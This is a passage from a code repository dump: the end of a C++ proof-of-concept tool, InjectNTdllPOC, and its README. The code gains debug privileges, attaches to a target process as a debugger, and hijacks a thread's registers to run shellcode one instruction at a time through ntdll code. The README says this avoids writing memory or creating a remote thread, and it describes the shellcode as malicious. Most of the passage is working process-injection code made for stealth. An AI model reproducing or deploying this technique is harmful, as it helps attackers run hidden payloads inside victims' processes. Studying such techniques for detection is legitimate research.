320 | break;
321 | }
322 |
323 | printf("EIP: %p\t EAX: %x\n", currentContext.Eip, currentContext.Eax);
324 |
325 | if (dwGlobal_CurrInstruction >= (sizeof(Global_InstructionList) / sizeof(Global_InstructionList[0])))
326 | {
327 | // finished executing all instructions - restore original context
328 | printf("We have finished, let's restore the old context\n\n");
329 | SetThreadContext(hTargetThread, &Global_OrigContext);
330 | break;
331 | }
332 |
333 | // get current instruction entry
334 | pCurrInstruction = &Global_InstructionList[dwGlobal_CurrInstruction];
335 |
336 | // set instruction ptr to next instruction
337 | currentContext.Eip = pCurrInstruction->dwInstructionAddr;
338 |
339 | // check register flags
340 | if (pCurrInstruction->dwInstructionFlags & FLAG_EAX)
341 | {
342 | // set eax
343 | printf(" mov eax, 0x%x\n", pCurrInstruction->dwEax);
344 | currentContext.Eax = pCurrInstruction->dwEax;
345 | }
346 | else if (pCurrInstruction->dwInstructionFlags & FLAG_EBX)
347 | {
348 | // set ebx
349 | printf(" mov ebx, 0x%x\n", pCurrInstruction->dwEbx);
350 | currentContext.Ebx = pCurrInstruction->dwEbx;
351 | }
352 | else if (pCurrInstruction->dwInstructionFlags & FLAG_ECX)
353 | {
354 | // set ecx
355 | printf(" mov ecx, 0x%x\n", pCurrInstruction->dwEcx);
356 | currentContext.Ecx = pCurrInstruction->dwEcx;
357 | }
358 | else if (pCurrInstruction->dwInstructionFlags & FLAG_EDX)
359 | {
360 | // set edx
361 | printf(" mov edx, 0x%x\n", pCurrInstruction->dwEdx);
362 | currentContext.Edx = pCurrInstruction->dwEdx;
363 | }
364 | else if (pCurrInstruction->dwInstructionFlags & FLAG_EDI)
365 | {
366 | // set edi
367 | printf(" mov edi, 0x%x\n", pCurrInstruction->dwEdi);
368 | currentContext.Edi = pCurrInstruction->dwEdi;
369 | }
370 | else if (pCurrInstruction->dwInstructionFlags & FLAG_ESI)
371 | {
372 | // set esi
373 | printf(" mov esi, 0x%x\n", pCurrInstruction->dwEsi);
374 | currentContext.Esi = pCurrInstruction->dwEsi;
375 | }
376 |
377 | // print current instruction label
378 | printf(" %s\n", pCurrInstruction->dwInstructionAddr, pCurrInstruction->pLabel);
379 |
380 | // check if this is a 'call' instruction
381 | if (pCurrInstruction->dwInstructionFlags & FLAG_CALL)
382 | {
383 | // set a hardware breakpoint on the first instruction after the 'call'
384 | currentContext.Dr0 = pCurrInstruction->dwInstructionAddr + pCurrInstruction->dwInstructionLength;
385 | currentContext.Dr7 = 1;
386 | }
387 | else
388 | {
389 | // single step
390 | currentContext.EFlags |= 0x100;
391 | }
392 |
393 | // move to the next instruction
394 | dwGlobal_CurrInstruction++;
395 |
396 | if (!SetThreadContext(hTargetThread, ¤tContext)) {
397 | printf("Unable to set thread context");
398 | break;
399 | }
400 |
401 | // continue execution
402 | ContinueDebugEvent(DebugEv->dwProcessId, DebugEv->dwThreadId, DBG_CONTINUE);
403 | CloseHandle(hTargetThread);
404 | }
405 |
406 | system("pause");
407 | }
408 |
409 | int main(int argc, char** argv)
410 | {
411 |
412 | if (argc < 2) {
413 | printf("Usage: %s [processToInject]", argv[0]);
414 | exit(1);
415 | }
416 |
417 | printf("[+] Getting seDebugPrivilege\n");
418 | if (!AdjustPrivileges()) {
419 | printf("[-] Unable to get privileges");
420 | exit(1);
421 | }
422 |
423 |
424 | std::string processToInject(argv[1]);
425 | std::wstring ws(processToInject.begin(), processToInject.end());
426 | DWORD targetPid = FindProcessId(ws);
427 |
428 | if (targetPid == 0) {
429 | printf("[-] Unable to find target Pid");
430 | exit(1);
431 | }
432 |
433 | printf("[+] Scanning ntdll to populate instruction list...\n");
434 |
435 | // scan for instructions
436 | if (ScanForInstructions() != 0)
437 | {
438 | printf("[-] Failed ScanForInstructions");
439 | exit(1);
440 | }
441 |
442 | printf("[+] Attaching to %s as a debugger\n", argv[1]);
443 |
444 | if (!DebugActiveProcess(targetPid)) {
445 | printf("[-] Unable to attach the target process (verify privileges)");
446 | exit(1);
447 | }
448 |
449 | DebuggerMainLoop();
450 |
451 | DebugActiveProcessStop(targetPid);
452 | CloseHandle(hTargetThread);
453 | printf("\nFinished\n");
454 |
455 | return 0;
456 | }
--------------------------------------------------------------------------------
/Media/poc.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Maff1t/InjectNtdllPOC/af666ea1dfb699f8d08994b10038b5cf69fac5ff/Media/poc.gif
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # InjectNTdllPOC
2 |
3 | 
4 |
5 | This simple PoC illustrate a possible process injection technique to inject shellcode without reading/writing the memory of the target process, and without creating a remote thread.
6 |
7 | ## How does it works
8 |
9 | This technique is based on [this](https://www.x86matthew.com/view_post?id=windows_no_exec) amazing work, that illustrates how to execute a shellcode without allocating any piece of memory, by taking advantage of the code of ntdll.
10 | In the article [@x86matthew](https://twitter.com/x86matthew) use an exception handler, to block the execution after each instruction and modify the EIP register to point to the next ntdll instruction.
11 |
12 | Reading this article I thought that it was possible to do the same in a remote process, exchanging the local exception handler with a debugger, that catches every exception raised by the debuggee and modify the context of the remote thread (using SetContextThread API) to point to the next instruction to execute.
13 |
14 | In this way is possible to execute a shellcode inside a remote process without allocating and writing any piece of memory inside the target process, and without creating a remote thread to execute the shellcode.
15 |
16 | Obviously, the price to pay is the necessity to have administrative privileges, to attach the remote process as a debugger.
17 |
18 | ## Actual Limitations
19 |
20 | This code is simply a proof-of-concept, and is far from being stable.
21 | Due to the fact that we don't want to create a remote thread, we have to casually choose a thread inside the remote process and force it to execute our malicious shellcode.
22 |
23 | The main implication of this approach is that when we modify the context of this causual thread, we could make the program crash.
24 | Moreover, with multi-threaded applications, due to the thread scheduling, our shellcode could be interrupted before completing the execution.
--------------------------------------------------------------------------------